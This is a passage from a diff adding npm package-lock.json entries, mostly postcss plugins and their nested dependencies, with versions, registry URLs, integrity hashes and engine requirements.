"sha512-1yD6RmLI1XBfxugvORwlck6f75tYL+iR0jqwsOrOxMZyGYqUuDhJ0l4AXdO1iX/FTs9cBAMEk1gWSEx1kSbylg==", + "dev": true, + "dependencies": { + "locate-path": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/pkg-up/node_modules/locate-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-3.0.0.tgz", + "integrity": "sha512-7AO748wWnIhNqAuaty2ZWHkQHRSNfPVIsPIfwEOWO22AmaoVrWavlOcMR5nzTLNYvp36X220/maaRsrec1G65A==", + "dev": true, + "dependencies": { + "p-locate": "^3.0.0", + "path-exists": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/pkg-up/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dev": true, + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/pkg-up/node_modules/p-locate": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-3.0.0.tgz", + "integrity": "sha512-x+12w/To+4GFfgJhBEpiDcLozRJGegY+Ei7/z0tSLkMmxGZNybVMSfWj9aJn8Z5Fc7dBUNJOOVgPv2H7IwulSQ==", + "dev": true, + "dependencies": { + "p-limit": "^2.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/pkg-up/node_modules/path-exists": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-3.0.0.tgz", + "integrity": "sha512-bpC7GYwiDYQ4wYLe+FA8lhRjhQCMcQGuSgGGqDkg/QerRWw9CmGRT0iSOVRSZJ29NMLZgIzqaljJ63oaL4NIJQ==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/platform": { + "version": "1.3.6", + "resolved": "https://registry.npmjs.org/platform/-/platform-1.3.6.tgz", + "integrity": "sha512-fnWVljUchTro6RiCFvCXBbNhJc2NijN7oIQxbwsyL0buWJPG85v81ehlHI9fXrJsMNgTofEoWIQeClKpgxFLrg==", + "dev": true + }, + "node_modules/pluralize": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/pluralize/-/pluralize-8.0.0.tgz", + "integrity": "sha512-Nc3IT5yHzflTfbjgqWcCPpo7DaKy4FnpB0l/zCAW0Tc7jxAiuqSxHasntB3D7887LSrA93kDJ9IXovxJYxyLCA==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/pngjs": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/pngjs/-/pngjs-5.0.0.tgz", + "integrity": 
"sha512-40QW5YalBNfQo5yRYmiw7Yz6TKKVr3h6970B2YE+3fQpsWcrbj1PzJgxeJ19DRQjhMbKPIuMY8rFaXc8moolVw==", + "dev": true, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/policyfile": { + "version": "0.0.4", + "resolved": "https://registry.npmjs.org/policyfile/-/policyfile-0.0.4.tgz", + "integrity": "sha512-UfDtlscNialXfmVEwEPm0t/5qtM0xPK025eYWd/ilv89hxLIhVQmt3QIzMHincLO2MBtZyww0386pt13J4aIhQ==", + "engines": { + "node": "*" + } + }, + "node_modules/polished": { + "version": "4.3.1", + "resolved": "https://registry.npmjs.org/polished/-/polished-4.3.1.tgz", + "integrity": "sha512-OBatVyC/N7SCW/FaDHrSd+vn0o5cS855TOmYi4OkdWUMSJCET/xip//ch8xGUvtr3i44X9LVyWwQlRMTN3pwSA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/runtime": "^7.17.8" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/posix-character-classes": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/posix-character-classes/-/posix-character-classes-0.1.1.tgz", + "integrity": "sha512-xTgYBc3fuo7Yt7JbiuFxSYGToMoz8fLoE6TC9Wx1P/u+LfeThMOAqmuyECnlBaaJb+u1m9hHiXUEtwW4OzfUJg==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/possible-typed-array-names": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/possible-typed-array-names/-/possible-typed-array-names-1.0.0.tgz", + "integrity": "sha512-d7Uw+eZoloe0EHDIYoe+bQ5WXnGMOpmiZFTuMWCwpjzzkL2nTjcKiAk4hh8TjnGye2TwWOk3UXucZ+3rbmBa8Q==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/postcss": { + "version": "8.4.38", + "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.4.38.tgz", + "integrity": "sha512-Wglpdk03BSfXkHoQa3b/oulrotAkwrlLDRSOb9D0bN86FdRyE9lppSp33aHNPgBa0JKCoB+drFLZkQoRRYae5A==", + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/postcss" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "dependencies": { + "nanoid": "^3.3.7", + "picocolors": "^1.0.0", + "source-map-js": "^1.2.0" + }, + "engines": { + "node": "^10 || ^12 || >=14" + } + }, + "node_modules/postcss-attribute-case-insensitive": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/postcss-attribute-case-insensitive/-/postcss-attribute-case-insensitive-6.0.2.tgz", + "integrity": "sha512-IRuCwwAAQbgaLhxQdQcIIK0dCVXg3XDUnzgKD8iwdiYdwU4rMWRWyl/W9/0nA4ihVpq5pyALiHB2veBJ0292pw==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-calc": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/postcss-calc/-/postcss-calc-9.0.1.tgz", + "integrity": "sha512-TipgjGyzP5QzEhsOZUaIkeO5mKeMFpebWzRogWG/ysonUlnHcq5aJe0jOjpfzUU8PeSaBQnrE8ehR0QA5vs8PQ==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.11", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.2" + } + }, + "node_modules/postcss-clamp": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/postcss-clamp/-/postcss-clamp-4.1.0.tgz", + "integrity": "sha512-ry4b1Llo/9zz+PKC+030KUnPITTJAHeOwjfAyyB60eT0AorGLdzp52s31OsPRHRf8NchkgFoG2y6fCfn1IV1Ow==", + "dev": true, + "dependencies": { + "postcss-value-parser": 
"^4.2.0" + }, + "engines": { + "node": ">=7.6.0" + }, + "peerDependencies": { + "postcss": "^8.4.6" + } + }, + "node_modules/postcss-color-functional-notation": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/postcss-color-functional-notation/-/postcss-color-functional-notation-5.1.0.tgz", + "integrity": "sha512-w2R4py6zrVE1U7FwNaAc76tNQlG9GLkrBbcFw+VhUjyDDiV28vfZG+l4LyPmpoQpeSJVtu8VgNjE8Jv5SpC7dQ==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/postcss-progressive-custom-properties": "^2.3.0", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-color-hex-alpha": { + "version": "9.0.2", + "resolved": "https://registry.npmjs.org/postcss-color-hex-alpha/-/postcss-color-hex-alpha-9.0.2.tgz", + "integrity": "sha512-SfPjgr//VQ/DOCf80STIAsdAs7sbIbxATvVmd+Ec7JvR8onz9pjawhq3BJM3Pie40EE3TyB0P6hft16D33Nlyg==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-color-rebeccapurple": { + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/postcss-color-rebeccapurple/-/postcss-color-rebeccapurple-8.0.2.tgz", + "integrity": "sha512-xWf/JmAxVoB5bltHpXk+uGRoGFwu4WDAR7210el+iyvTdqiKpDhtcT8N3edXMoVJY0WHFMrKMUieql/wRNiXkw==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-colormin": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-colormin/-/postcss-colormin-6.0.0.tgz", + "integrity": "sha512-EuO+bAUmutWoZYgHn2T1dG1pPqHU6L4TjzPlu4t1wZGXQ/fxV16xg2EJmYi0z+6r+MGV1yvpx1BHkUaRrPa2bw==", + "dev": true, + "dependencies": { + "browserslist": "^4.21.4", + "caniuse-api": "^3.0.0", + "colord": "^2.9.1", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-convert-values": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-convert-values/-/postcss-convert-values-6.0.0.tgz", + "integrity": "sha512-U5D8QhVwqT++ecmy8rnTb+RL9n/B806UVaS3m60lqle4YDFcpbS3ae5bTQIh3wOGUSDHSEtMYLs/38dNG7EYFw==", + "dev": true, + "dependencies": { + "browserslist": "^4.21.4", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-custom-media": { + "version": "9.1.5", + "resolved": "https://registry.npmjs.org/postcss-custom-media/-/postcss-custom-media-9.1.5.tgz", + "integrity": "sha512-GStyWMz7Qbo/Gtw1xVspzVSX8eipgNg4lpsO3CAeY4/A1mzok+RV6MCv3fg62trWijh/lYEj6vps4o8JcBBpDA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/cascade-layer-name-parser": "^1.0.2", + 
"@csstools/css-parser-algorithms": "^2.2.0", + "@csstools/css-tokenizer": "^2.1.1", + "@csstools/media-query-list-parser": "^2.1.1" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-custom-properties": { + "version": "13.3.2", + "resolved": "https://registry.npmjs.org/postcss-custom-properties/-/postcss-custom-properties-13.3.2.tgz", + "integrity": "sha512-2Coszybpo8lpLY24vy2CYv9AasiZ39/bs8Imv0pWMq55Gl8NWzfc24OAo3zIX7rc6uUJAqESnVOMZ6V6lpMjJA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/cascade-layer-name-parser": "^1.0.5", + "@csstools/css-parser-algorithms": "^2.3.2", + "@csstools/css-tokenizer": "^2.2.1", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-custom-selectors": { + "version": "7.1.6", + "resolved": "https://registry.npmjs.org/postcss-custom-selectors/-/postcss-custom-selectors-7.1.6.tgz", + "integrity": "sha512-svsjWRaxqL3vAzv71dV0/65P24/FB8TbPX+lWyyf9SZ7aZm4S4NhCn7N3Bg+Z5sZunG3FS8xQ80LrCU9hb37cw==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/cascade-layer-name-parser": "^1.0.5", + "@csstools/css-parser-algorithms": "^2.3.2", + "@csstools/css-tokenizer": "^2.2.1", + "postcss-selector-parser": "^6.0.13" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-dir-pseudo-class": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/postcss-dir-pseudo-class/-/postcss-dir-pseudo-class-7.0.2.tgz", + "integrity": "sha512-cMnslilYxBf9k3qejnovrUONZx1rXeUZJw06fgIUBzABJe3D2LiLL5WAER7Imt3nrkaIgG05XZBztueLEf5P8w==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-discard-comments": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-discard-comments/-/postcss-discard-comments-6.0.0.tgz", + "integrity": "sha512-p2skSGqzPMZkEQvJsgnkBhCn8gI7NzRH2683EEjrIkoMiwRELx68yoUJ3q3DGSGuQ8Ug9Gsn+OuDr46yfO+eFw==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-discard-duplicates": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-discard-duplicates/-/postcss-discard-duplicates-6.0.0.tgz", + "integrity": "sha512-bU1SXIizMLtDW4oSsi5C/xHKbhLlhek/0/yCnoMQany9k3nPBq+Ctsv/9oMmyqbR96HYHxZcHyK2HR5P/mqoGA==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-discard-empty": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-discard-empty/-/postcss-discard-empty-6.0.0.tgz", + "integrity": "sha512-b+h1S1VT6dNhpcg+LpyiUrdnEZfICF0my7HAKgJixJLW7BnNmpRH34+uw/etf5AhOlIhIAuXApSzzDzMI9K/gQ==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, 
+ "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-discard-overridden": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-discard-overridden/-/postcss-discard-overridden-6.0.0.tgz", + "integrity": "sha512-4VELwssYXDFigPYAZ8vL4yX4mUepF/oCBeeIT4OXsJPYOtvJumyz9WflmJWTfDwCUcpDR+z0zvCWBXgTx35SVw==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-double-position-gradients": { + "version": "4.0.4", + "resolved": "https://registry.npmjs.org/postcss-double-position-gradients/-/postcss-double-position-gradients-4.0.4.tgz", + "integrity": "sha512-nUAbUXURemLXIrl4Xoia2tiu5z/n8sY+BVDZApoeT9BlpByyrp02P/lFCRrRvZ/zrGRE+MOGLhk8o7VcMCtPtQ==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/postcss-progressive-custom-properties": "^2.3.0", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-focus-visible": { + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/postcss-focus-visible/-/postcss-focus-visible-8.0.2.tgz", + "integrity": "sha512-f/Vd+EC/GaKElknU59esVcRYr/Y3t1ZAQyL4u2xSOgkDy4bMCmG7VP5cGvj3+BTLNE9ETfEuz2nnt4qkZwTTeA==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-focus-within": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/postcss-focus-within/-/postcss-focus-within-7.0.2.tgz", + "integrity": "sha512-AHAJ89UQBcqBvFgQJE9XasGuwMNkKsGj4D/f9Uk60jFmEBHpAL14DrnSk3Rj+SwZTr/WUG+mh+Rvf8fid/346w==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-font-variant": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/postcss-font-variant/-/postcss-font-variant-5.0.0.tgz", + "integrity": "sha512-1fmkBaCALD72CK2a9i468mA/+tr9/1cBxRRMXOUaZqO43oWPR5imcyPjXwuv7PXbCid4ndlP5zWhidQVVa3hmA==", + "dev": true, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/postcss-gap-properties": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/postcss-gap-properties/-/postcss-gap-properties-4.0.1.tgz", + "integrity": "sha512-V5OuQGw4lBumPlwHWk/PRfMKjaq/LTGR4WDTemIMCaMevArVfCCA9wBJiL1VjDAd+rzuCIlkRoRvDsSiAaZ4Fg==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-image-set-function": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/postcss-image-set-function/-/postcss-image-set-function-5.0.2.tgz", + "integrity": "sha512-Sszjwo0ubETX0Fi5MvpYzsONwrsjeabjMoc5YqHvURFItXgIu3HdCjcVuVKGMPGzKRhgaknmdM5uVWInWPJmeg==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": 
"^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-import": { + "version": "15.1.0", + "resolved": "https://registry.npmjs.org/postcss-import/-/postcss-import-15.1.0.tgz", + "integrity": "sha512-hpr+J05B2FVYUAXHeK1YyI267J/dDDhMU6B6civm8hSY1jYJnBXxzKDKDswzJmtLHryrjhnDjqqp/49t8FALew==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.0.0", + "read-cache": "^1.0.0", + "resolve": "^1.1.7" + }, + "engines": { + "node": ">=14.0.0" + }, + "peerDependencies": { + "postcss": "^8.0.0" + } + }, + "node_modules/postcss-initial": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/postcss-initial/-/postcss-initial-4.0.1.tgz", + "integrity": "sha512-0ueD7rPqX8Pn1xJIjay0AZeIuDoF+V+VvMt/uOnn+4ezUKhZM/NokDeP6DwMNyIoYByuN/94IQnt5FEkaN59xQ==", + "dev": true, + "peerDependencies": { + "postcss": "^8.0.0" + } + }, + "node_modules/postcss-lab-function": { + "version": "5.2.3", + "resolved": "https://registry.npmjs.org/postcss-lab-function/-/postcss-lab-function-5.2.3.tgz", + "integrity": "sha512-fi32AYKzji5/rvgxo5zXHFvAYBw0u0OzELbeCNjEZVLUir18Oj+9RmNphtM8QdLUaUnrfx8zy8vVYLmFLkdmrQ==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/css-color-parser": "^1.2.0", + "@csstools/css-parser-algorithms": "^2.1.1", + "@csstools/css-tokenizer": "^2.1.1", + "@csstools/postcss-progressive-custom-properties": "^2.3.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-loader": { + "version": "7.3.3", + "resolved": "https://registry.npmjs.org/postcss-loader/-/postcss-loader-7.3.3.tgz", + "integrity": "sha512-YgO/yhtevGO/vJePCQmTxiaEwER94LABZN0ZMT4A0vsak9TpO+RvKRs7EmJ8peIlB9xfXCsS7M8LjqncsUZ5HA==", + "dev": true, + "dependencies": { + "cosmiconfig": "^8.2.0", + "jiti": "^1.18.2", + "semver": "^7.3.8" + }, + "engines": { + "node": ">= 14.15.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "postcss": "^7.0.0 || ^8.0.1", + "webpack": "^5.0.0" + } + }, + "node_modules/postcss-loader/node_modules/cosmiconfig": { + "version": "8.3.6", + "resolved": "https://registry.npmjs.org/cosmiconfig/-/cosmiconfig-8.3.6.tgz", + "integrity": "sha512-kcZ6+W5QzcJ3P1Mt+83OUv/oHFqZHIx8DuxG6eZ5RGMERoLqp4BuGjhHLYGK+Kf5XVkQvqBSmAy/nGWN3qDgEA==", + "dev": true, + "dependencies": { + "import-fresh": "^3.3.0", + "js-yaml": "^4.1.0", + "parse-json": "^5.2.0", + "path-type": "^4.0.0" + }, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/sponsors/d-fischer" + }, + "peerDependencies": { + "typescript": ">=4.9.5" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/postcss-loader/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dev": true, + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/postcss-loader/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": 
"sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dev": true, + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/postcss-loader/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "dev": true + }, + "node_modules/postcss-logical": { + "version": "6.2.0", + "resolved": "https://registry.npmjs.org/postcss-logical/-/postcss-logical-6.2.0.tgz", + "integrity": "sha512-aqlfKGaY0nnbgI9jwUikp4gJKBqcH5noU/EdnIVceghaaDPYhZuyJVxlvWNy55tlTG5tunRKCTAX9yljLiFgmw==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-media-query-parser": { + "version": "0.2.3", + "resolved": "https://registry.npmjs.org/postcss-media-query-parser/-/postcss-media-query-parser-0.2.3.tgz", + "integrity": "sha512-3sOlxmbKcSHMjlUXQZKQ06jOswE7oVkXPxmZdoB1r5l0q6gTFTQSHxNxOrCccElbW7dxNytifNEo8qidX2Vsig==", + "dev": true + }, + "node_modules/postcss-merge-longhand": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-merge-longhand/-/postcss-merge-longhand-6.0.0.tgz", + "integrity": "sha512-4VSfd1lvGkLTLYcxFuISDtWUfFS4zXe0FpF149AyziftPFQIWxjvFSKhA4MIxMe4XM3yTDgQMbSNgzIVxChbIg==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0", + "stylehacks": "^6.0.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-merge-rules": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/postcss-merge-rules/-/postcss-merge-rules-6.0.1.tgz", + "integrity": "sha512-a4tlmJIQo9SCjcfiCcCMg/ZCEe0XTkl/xK0XHBs955GWg9xDX3NwP9pwZ78QUOWB8/0XCjZeJn98Dae0zg6AAw==", + "dev": true, + "dependencies": { + "browserslist": "^4.21.4", + "caniuse-api": "^3.0.0", + "cssnano-utils": "^4.0.0", + "postcss-selector-parser": "^6.0.5" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-minify-font-values": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-minify-font-values/-/postcss-minify-font-values-6.0.0.tgz", + "integrity": "sha512-zNRAVtyh5E8ndZEYXA4WS8ZYsAp798HiIQ1V2UF/C/munLp2r1UGHwf1+6JFu7hdEhJFN+W1WJQKBrtjhFgEnA==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-minify-gradients": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-minify-gradients/-/postcss-minify-gradients-6.0.0.tgz", + "integrity": "sha512-wO0F6YfVAR+K1xVxF53ueZJza3L+R3E6cp0VwuXJQejnNUH0DjcAFe3JEBeTY1dLwGa0NlDWueCA1VlEfiKgAA==", + "dev": true, + "dependencies": { + "colord": "^2.9.1", + "cssnano-utils": "^4.0.0", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-minify-params": { + "version": 
"6.0.0", + "resolved": "https://registry.npmjs.org/postcss-minify-params/-/postcss-minify-params-6.0.0.tgz", + "integrity": "sha512-Fz/wMQDveiS0n5JPcvsMeyNXOIMrwF88n7196puSuQSWSa+/Ofc1gDOSY2xi8+A4PqB5dlYCKk/WfqKqsI+ReQ==", + "dev": true, + "dependencies": { + "browserslist": "^4.21.4", + "cssnano-utils": "^4.0.0", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-minify-selectors": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-minify-selectors/-/postcss-minify-selectors-6.0.0.tgz", + "integrity": "sha512-ec/q9JNCOC2CRDNnypipGfOhbYPuUkewGwLnbv6omue/PSASbHSU7s6uSQ0tcFRVv731oMIx8k0SP4ZX6be/0g==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.5" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-modules-local-by-default": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/postcss-modules-local-by-default/-/postcss-modules-local-by-default-4.0.3.tgz", + "integrity": "sha512-2/u2zraspoACtrbFRnTijMiQtb4GW4BvatjaG/bCjYQo8kLTdevCUlwuBHx2sCnSyrI3x3qj4ZK1j5LQBgzmwA==", + "dev": true, + "dependencies": { + "icss-utils": "^5.0.0", + "postcss-selector-parser": "^6.0.2", + "postcss-value-parser": "^4.1.0" + }, + "engines": { + "node": "^10 || ^12 || >= 14" + }, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/postcss-nesting": { + "version": "11.3.0", + "resolved": "https://registry.npmjs.org/postcss-nesting/-/postcss-nesting-11.3.0.tgz", + "integrity": "sha512-JlS10AQm/RzyrUGgl5irVkAlZYTJ99mNueUl+Qab+TcHhVedLiylWVkKBhRale+rS9yWIJK48JVzQlq3LcSdeA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/selector-specificity": "^2.0.0", + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-normalize-charset": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-normalize-charset/-/postcss-normalize-charset-6.0.0.tgz", + "integrity": "sha512-cqundwChbu8yO/gSWkuFDmKrCZ2vJzDAocheT2JTd0sFNA4HMGoKMfbk2B+J0OmO0t5GUkiAkSM5yF2rSLUjgQ==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-normalize-display-values": { + "version": "6.0.0", + "resolved": 